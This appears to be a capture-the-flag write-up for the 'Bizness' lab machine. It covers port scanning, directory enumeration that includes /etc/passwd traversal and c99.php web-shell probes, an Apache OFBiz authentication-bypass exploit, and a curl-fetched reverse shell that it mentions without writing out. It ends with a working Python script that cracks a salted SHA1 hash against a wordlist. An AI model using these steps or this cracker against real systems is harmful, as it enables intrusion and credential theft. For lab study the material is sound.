Bizness
-
3 mins read
#obfiz IP: 10.10.11.252
Port Scan
sudo nmap --min-rate 1000 -p- -T4 -sV 10.10.11.252 -oG full_scan
[sudo] password for parallels:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-05 18:25 -03
Warning: 10.10.11.252 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.252 (10.10.11.252)
Host is up (0.13s latency).
Not shown: 65290 closed tcp ports (reset), 241 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp open http nginx 1.18.0
443/tcp open ssl/http nginx 1.18.0
38755/tcp open tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 140.75 seconds
DirScaner
dirsearch -u https://bizness.htb/ -e php,jsp,asp,aspx,js,md,bak,yaml,yml,toml,zip
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, js, md, bak, yaml, yml, toml, zip | HTTP method: GET | Threads: 25 | Wordlist size: 14668
Output File: /home/parallels/reports/https_bizness.htb/__24-02-05_18-35-33.txt
Target: https://bizness.htb/
[18:35:33] Starting:
[18:35:50] 400 - 795B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[18:35:51] 400 - 795B - /a%5c.aspx
[18:35:53] 302 - 0B - /accounting -> https://bizness.htb/accounting/
[18:36:22] 302 - 0B - /catalog -> https://bizness.htb/catalog/
[18:36:24] 302 - 0B - /common -> https://bizness.htb/common/
[18:36:24] 404 - 762B - /common/
[18:36:24] 404 - 780B - /common/config/api.ini
[18:36:24] 404 - 779B - /common/config/db.ini
[18:36:26] 302 - 0B - /content -> https://bizness.htb/content/
[18:36:26] 302 - 0B - /content/debug.log -> https://bizness.htb/content/control/main
[18:36:26] 302 - 0B - /content/ -> https://bizness.htb/content/control/main
[18:36:28] 200 - 34KB - /control/
[18:36:28] 200 - 34KB - /control
[18:36:29] 404 - 741B - /default.jsp
[18:36:29] 200 - 11KB - /control/login
[18:36:33] 302 - 0B - /error -> https://bizness.htb/error/
[18:36:33] 404 - 761B - /error/
[18:36:33] 404 - 770B - /error/error.log
[18:36:33] 302 - 0B - /example -> https://bizness.htb/example/
[18:36:40] 404 - 769B - /images/Sym.php
[18:36:40] 404 - 762B - /images/
[18:36:40] 302 - 0B - /images -> https://bizness.htb/images/
[18:36:40] 404 - 768B - /images/README
[18:36:40] 404 - 769B - /images/c99.php
[18:36:42] 302 - 0B - /index.jsp -> https://bizness.htb/control/main
WebContent
- Apache OFBiz exploit
Verify exploit path
Testing exploiting path
- It works the POC
Path to remote code execution
- Using the following repo https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass
Getting the reverse shell
- Using a file with bash one line payload and get the contents with curl
user.txt
Path to root
-
Finding the user file with sha1 hash
-
Files that contain references to
salt data
- File with salt data
- Python script to crack
import hashlib
import base64
import os
class TextToHash:
def __init__(self, hash_type="SHA256", pbkdf2_iterations=10000):
self.hash_type = hash_type
self.pbkdf2_iterations = pbkdf2_iterations
def crypt_bytes(self, salt, value):
if not salt:
salt = base64.urlsafe_b64encode(os.urandom(16)).decode('utf-8')
hash_obj = hashlib.new(self.hash_type)
hash_obj.update(salt.encode('utf-8'))
hash_obj.update(value)
hashed_bytes = hash_obj.digest()
result = f"${self.hash_type}${salt}${base64.urlsafe_b64encode(hashed_bytes).decode('utf-8').replace('+', '')}"
return result
def get_crypted_bytes(self, salt, value):
try:
hash_obj = hashlib.new(self.hash_type)
hash_obj.update(salt.encode('utf-8'))
hash_obj.update(value)
hashed_bytes = hash_obj.digest()
return base64.urlsafe_b64encode(hashed_bytes).decode('utf-8').replace('+', '')
except hashlib.NoSuchAlgorithmException as e:
raise Exception(f"There is an error happened with {self.hash_type}: {e}")
hash_t = "SHA1"
salt = "d"
target_hash = "$SHA1$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I="
wordlist = '/usr/wordlist/rockyou.txt'
encryptor = TextToHash(hash_t)
total_lines = sum(1 for _ in open(wordlist, 'r', encoding='latin-1'))
with open(wordlist, 'r', encoding='latin-1') as password_list:
for password in password_list:
value = password.strip()
hashed_password = encryptor.crypt_bytes(salt, value.encode('utf-8'))
if hashed_password == target_hash:
print(f"[+] Password: {value}, hash: {hashed_password}")
break
root.txt
